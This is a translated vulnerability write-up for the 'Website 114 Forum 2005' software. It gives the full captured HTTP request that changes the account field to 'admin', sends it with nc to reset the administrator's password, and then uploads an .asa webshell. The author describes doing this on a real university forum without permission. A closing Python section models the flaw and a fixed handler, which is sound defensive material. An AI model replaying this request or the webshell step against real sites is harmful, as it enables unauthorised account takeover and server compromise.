SoFunction
Updated on 2025-04-09

Website 114 Forum 2005 official version vulnerability

Keywords:
"Copyright Design and Production: Website 114"
Vulnerability description:
Website 114 Forum 2005 official version
/
The submitted form data and cookies are not verified,
so any registered user can modify the administrator's password.
Default admin backend: admin/
I used it today while I was working on a machine in a computer room.
http://www.***./xzl/BBS/
**A forum on the Medical University website.
Registered a user 33221.
Then jump to / and click "Modify Registration" and start capturing packets!
Save the captured packet in Notepad; its contents are as follows:
-----------------------------------------------------------------------------------------------------------
POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/-excel, application/-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.***./xzl/BBS//
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.***.
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
gentlemen
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
Modify registration information
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--

------------------------------------------------------------------------------------------------------------
Within it:
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6

Modify the first "33221" to "admin" to save the text as:

POST /xzl/BBS//SaveUser_Account.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/-excel, application/-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://www.***./xzl/BBS//
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7d61e41d605f6
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon)
Host: www.***.
Content-Length: 2304
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCTSQSAB=EKMKINHAIAACMGFMKABJDBME
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserCode"
admin
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtConfirmPassword"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtQuestion"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAnswer"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUserName"
33221
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="selSex"
gentlemen
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtNick"
11
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtProvince"
111
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtAddress"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtPostCode"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTel"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtMobile"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtFax"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtEmail"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtUrl"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtfile"; filename=""
Content-Type: application/octet-stream

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtOicq"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtDocument"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="submit"
Modify registration information
-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtId"

-----------------------------7d61e41d605f6
Content-Disposition: form-data; name="txtTempId"

-----------------------------7d61e41d605f6--
Here, because the username 33221 I registered is the same length as admin, there is no need to adjust the byte length (Content-Length).
Then submit it to the server using nc:
nc www.***. 80 <
The response says the member information was modified successfully.
Then log in as admin with the password 33221 that was submitted.
That is, of course, administrator permissions; log in to the admin backend, click "Modify column", upload the asa *, and you have the webshell.
After looking around, there is no patch for this yet. You could get a large number of webshells, but I only needed one server that is useful to me, and I haven't touched anything else.
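The root cause described above is that SaveUser_Account.asp decides which account to update from the txtUserCode field in the POST body rather than from the server-side session, so rewriting one field lets a logged-in user reset the administrator's password. The forum's ASP source is not on this page; the following is an added Python model of that logic, not the forum's own code, with the constructed body reusing the captured request's boundary and first three fields, an assumed in-memory user table (USERS), and assumed handler names. It contrasts the flawed handler with a hardened one that binds the update to the authenticated session and treats a mismatching account field as a tampering signal.

```python
import copy
import re
from typing import Optional

# Boundary string taken from the captured request above.
BOUNDARY = b"---------------------------7d61e41d605f6"


def _part(name: bytes, value: bytes) -> bytes:
    """One text field of a multipart/form-data body (constructed helper)."""
    return (b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="'
            + name + b'"\r\n\r\n' + value + b"\r\n")


# Constructed body: the first fields of the captured request, with txtUserCode
# already rewritten from "33221" to "admin" as the write-up describes.
TAMPERED_BODY = b"".join([
    _part(b"txtUserCode", b"admin"),
    _part(b"txtPassword", b"33221"),
    _part(b"txtConfirmPassword", b"33221"),
    b"--" + BOUNDARY + b"--\r\n",
])

_NAME = re.compile(rb'name="([^"]*)"')


def parse_multipart(body: bytes, boundary: bytes = BOUNDARY) -> dict:
    """Minimal multipart/form-data parser: {field name: value} for text fields."""
    fields = {}
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):          # closing delimiter "--boundary--"
            break
        headers, _, value = chunk.partition(b"\r\n\r\n")
        match = _NAME.search(headers)
        if match:
            fields[match.group(1).decode()] = value.rstrip(b"\r\n").decode()
    return fields


# Constructed in-memory user table standing in for the forum's database.
USERS = {
    "admin": {"password": "admin-original-pw", "is_admin": True},
    "33221": {"password": "33221", "is_admin": False},
}


def save_user_account_vulnerable(session_user: Optional[str], form: dict, users: dict) -> str:
    """Models the flaw: the account to update is read from the POST body;
    the session user is never consulted."""
    target = form["txtUserCode"]               # attacker-controlled
    if form["txtPassword"] != form["txtConfirmPassword"]:
        return "passwords do not match"
    users[target]["password"] = form["txtPassword"]
    return f"member {target} modified successfully"


def save_user_account_fixed(session_user: Optional[str], form: dict, users: dict) -> str:
    """Hardened handler: the account is the one bound to the authenticated session."""
    if session_user is None or session_user not in users:
        return "not logged in"
    # Identity fields sent by the client are never authoritative; a mismatch is
    # a tampering signal worth logging, and the request is refused.
    if form.get("txtUserCode", session_user) != session_user:
        return "rejected: submitted account does not match the session user"
    if form["txtPassword"] != form["txtConfirmPassword"]:
        return "passwords do not match"
    users[session_user]["password"] = form["txtPassword"]
    return f"member {session_user} modified successfully"


def demo() -> dict:
    """Run the tampered request through both handlers as user 33221; return outcomes."""
    form = parse_multipart(TAMPERED_BODY)
    vuln_users = copy.deepcopy(USERS)
    fixed_users = copy.deepcopy(USERS)
    return {
        "vulnerable": (save_user_account_vulnerable("33221", form, vuln_users),
                       vuln_users["admin"]["password"]),
        "fixed": (save_user_account_fixed("33221", form, fixed_users),
                  fixed_users["admin"]["password"]),
    }


if __name__ == "__main__":
    for name, (reply, admin_pw) in demo().items():
        print(f"{name:10s} -> {reply!r}; admin password now {admin_pw!r}")
```

The same pattern applies to the txtId and txtTempId hidden fields in the captured request: anything the client can edit is input, and the record to modify must come from server-side session state, with the password check and any admin-only flags enforced there as well.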